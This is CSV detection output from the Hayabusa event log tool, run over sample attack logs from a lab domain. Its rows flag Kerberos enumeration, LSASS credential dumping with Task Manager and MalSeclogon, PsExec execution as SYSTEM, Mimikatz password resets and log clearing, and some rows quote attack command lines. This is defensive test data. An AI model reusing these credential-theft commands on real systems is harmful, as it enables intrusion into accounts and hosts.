-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.035 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.047 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.052 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.056 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:11.514 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 
| Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:11.878 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:12.553 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-05 05:59:31.403 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx +2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via 
Task Manager.evtx +2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-05 06:19:16.741 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,info,,File 
Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 
+09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: 
SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:17.757 +09:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: 
A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 07:09:13.666 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-05 07:09:13.671 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-05 07:09:13.672 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-05 07:09:13.673 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f54,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-05 07:09:18.652 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 
0x10e6e929b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-08 02:33:01.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.474 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.485 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.636 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.638 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 
747F3D96-9ACD-61AF-D701-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-09 22:41:50.714 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx" +2021-12-10 03:50:47.980 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.333 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 
0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High 
Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.005 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.099 +09:00,FS03.offsec.lan,4673,medium,CredAccess 
